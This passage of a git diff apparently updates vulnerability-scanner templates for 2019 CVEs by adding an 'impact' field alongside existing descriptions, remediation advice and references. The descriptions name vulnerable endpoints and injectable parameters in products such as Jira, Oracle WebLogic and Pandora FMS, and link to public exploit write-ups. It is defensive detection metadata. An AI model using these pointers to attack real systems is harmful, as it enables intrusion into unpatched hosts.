in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of phpMyChat-Plus or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index df11994ce1..2082ccc709 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml 
@@ -5,6 +5,8 @@ info: author: KBA@SOGETI_ESEC,madrobot,dwisiswant0 severity: medium description: WordPress Email Subscribers & Newsletters plugin before 4.2.3 is susceptible to arbitrary file retrieval via a flaw that allows unauthenticated file download and user information disclosure. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: | Update to the latest version of WordPress Email Subscribers & Newsletters plugin (4.2.3) or apply the patch provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index 2819373ab7..ada500aac5 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TVT NVMS-1000 devices allow GET /.. local file inclusion attacks. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the local file inclusion vulnerability in TVT NVMS 1000 software. reference: diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index fac2df72fe..dea124d4d1 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to the system, remote code execution, and potential compromise of sensitive data. remediation: | Apply the latest patch or update to Simple Employee Records System 1.0 to fix the unrestricted file upload vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 4524c6e47e..d68ee2f479 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query. + impact: | + Successful exploitation of this vulnerability can lead to session hijacking, defacement of the website, theft of sensitive information, or the installation of malware on the victim's system. remediation: | Update to the latest version of the WordPress CTHthemes plugin, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index 0ae86aa68e..305687125c 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system. remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. reference: - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index b0f741ba55..0e3427f97a 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x,c-sh0 severity: critical description: InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can bypass authentication and gain unauthorized access to the InfluxDB database. remediation: Update Influxdb to version 1.7.6~rc0-1 or higher. reference: - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml index ca9fd6f2c0..7280b23277 100644 --- a/http/cves/2019/CVE-2019-2578.yaml +++ b/http/cves/2019/CVE-2019-2578.yaml 
@@ -5,6 +5,8 @@ info: author: leovalcante severity: high description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Apply the necessary patches or updates provided by Oracle to fix the Broken Access Control vulnerability (CVE-2019-2578). reference: diff --git a/http/cves/2019/CVE-2019-2579.yaml b/http/cves/2019/CVE-2019-2579.yaml index beaca84ef8..e5efce7b56 100644 --- a/http/cves/2019/CVE-2019-2579.yaml +++ b/http/cves/2019/CVE-2019-2579.yaml @@ -5,6 +5,8 @@ info: author: leovalcante severity: medium description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data manipulation, or denial of service. remediation: | Apply the necessary patches or updates provided by Oracle to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml index 1f8ca48351..20375c1e1e 100644 --- a/http/cves/2019/CVE-2019-2588.yaml +++ b/http/cves/2019/CVE-2019-2588.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Oracle Business Intelligence versions 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0 are vulnerable to path traversal in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security). + impact: | + An attacker can read sensitive files on the system, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Apply the necessary patches or updates provided by Oracle to fix the path traversal vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 677d3d3e36..010d59e486 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks. remediation: | Apply the necessary patches or updates provided by Oracle to fix this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index da53d8eeb9..322b204b8d 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 0.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index 92af704750..ad7a59c234 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or disrupt the availability of the system. remediation: | Apply the latest security patches provided by Oracle to fix this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index 2626c86602..7629d3c27b 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by Atlassian to fix the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index 59dbfdc84c..9a411a6fc0 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml 
@@ -5,6 +5,8 @@ info: author: TechbrunchFR,milo2012 severity: medium description: Atlasssian Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 is susceptible to incorrect authorization. The ManageFilters.jspa resource allows a remote attacker to enumerate usernames via an incorrect authorization check, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + The vulnerability allows unauthorized users to access sensitive information or perform unauthorized actions. remediation: Ensure this permission is restricted to specific groups that require it via Administration > System > Global Permissions. Turning the feature off will not affect existing filters and dashboards. If you change this setting, you will still need to update the existing filters and dashboards if they have already been shared publicly. Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. reference: - https://jira.atlassian.com/browse/JRASERVER-69244 diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index f6f653ee44..bdb8450b61 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, data theft, or defacement. remediation: | Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index 9e44d8d3a8..bfa23f15b1 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml 
@@ -5,6 +5,8 @@ info: author: Ganofins severity: medium description: Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker rest resource, enabling an attacker to enumerate usernames and gain improper access. + impact: | + This vulnerability can lead to unauthorized access to sensitive data, potential data breaches, and unauthorized actions within the Jira system. remediation: | Apply the latest security patches and updates provided by Atlassian to fix the vulnerability and ensure proper authorization controls are in place. reference: diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index 30d168a8bb..9de5f19aad 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Spring Cloud Config Server versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files. An attacker can send a request using a specially crafted URL that can lead to a directory traversal attack. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches. reference: diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 1540eb3410..cbfc657859 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml 
@@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index b48df5eab6..619fd99c3b 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index 959857279c..ea4e48cf1d 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml 
@@ -5,6 +5,8 @@ info: author: _0xf4n9x_ severity: critical description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index 678f521075..9b8678c6d3 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system. remediation: | Apply the latest patch or upgrade to a version that is not affected by this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index ca762267b4..bdf27fab1d 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml 
@@ -5,6 +5,8 @@ info: author: omarkurt severity: high description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. + impact: | + This vulnerability can lead to unauthorized access to sensitive information stored on the server. remediation: | Apply the patch provided by the Rails team or upgrade to a version that includes the fix. reference: diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index ee3364ce0f..8f07bea5cb 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Revive Adserver 4.2 is susceptible to remote code execution. An attacker can send a crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. This can be exploited to perform various types of attacks, e.g. serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third-party websites. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or upgrade to a newer version of Revive Adserver. reference: diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index 8ee57782c1..4fecb8aecf 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of WordPress Sell Media or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index 553ab1b2fa..cba41a2453 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Drupal site. remediation: | Apply the official security patch provided by Drupal to fix the deserialization vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index d8e67ef730..71c7fa8274 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php. + impact: | + An unauthenticated attacker can read sensitive files or traverse directories on the target system, potentially leading to unauthorized access or information disclosure. remediation: | Update to the latest version of W3 Total Cache plugin (0.9.3 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index eefec8e909..b5c9c2aeb9 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index c3acdeaf73..1931a0178e 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station. reference: diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index 672f13dbd9..ccf5546c1a 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead. reference: - https://github.com/verifysecurity/CVE-2019-7219 diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index 67aeaeb7f0..18e18b7ce1 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Sonatype Nexus Repository Manager to a version higher than 3.15.0. reference: diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 7941fd74d0..0e0ffa3ef0 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Linear eMerge E3-Series devices are vulnerable to local file inclusion. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patch or update to a non-vulnerable version of eMerge E3. reference: diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index ec689977bb..72eea519b6 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index d0182f2e2a..fa462fafc9 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or update to a non-vulnerable version of eMerge E3. reference: diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml index 8a7e97309a..3df0617824 100644 --- a/http/cves/2019/CVE-2019-7275.yaml +++ b/http/cves/2019/CVE-2019-7275.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Optergy Proton/Enterprise Building Management System contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest security patches or updates provided by Optergy to fix the open redirect vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index 8ad6f5140f..4050514737 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the system. remediation: | Apply the latest firmware update provided by the vendor to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index 24fa81fe0e..04f1718ce0 100644 
--- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -5,6 +5,8 @@ info: author: _darrenmartyn severity: high description: The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service. remediation: | Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml index 5d45da230f..e2a024de66 100644 --- a/http/cves/2019/CVE-2019-7543.yaml +++ b/http/cves/2019/CVE-2019-7543.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of KindEditor or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index c84527d2f4..5799b7b432 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + impact: | + Arbitrary code execution can result in unauthorized access, data leakage, and system compromise. remediation: | Apply the latest security patches or upgrade to a patched version of Kibana to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 41a23a3590..e7adcb074d 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk severity: high description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server-side request forgery, and potential remote code execution. remediation: | Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks. reference: diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index 4c13e7fb2c..3f25c2186c 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index d7e40df32a..542b2b14ec 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -5,6 +5,8 @@ info: author: Kishore Krishna (siLLyDaddy) severity: high description: Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion. + impact: | + This vulnerability can result in sensitive information exposure, unauthorized access to files, and potential compromise of the Jira application. remediation: | Apply the latest security patches or updates provided by Atlassian to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 3229b25e29..d96137d3f5 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Jira application. remediation: | Apply the latest security patches and updates provided by Atlassian to fix the vulnerability. reference: 
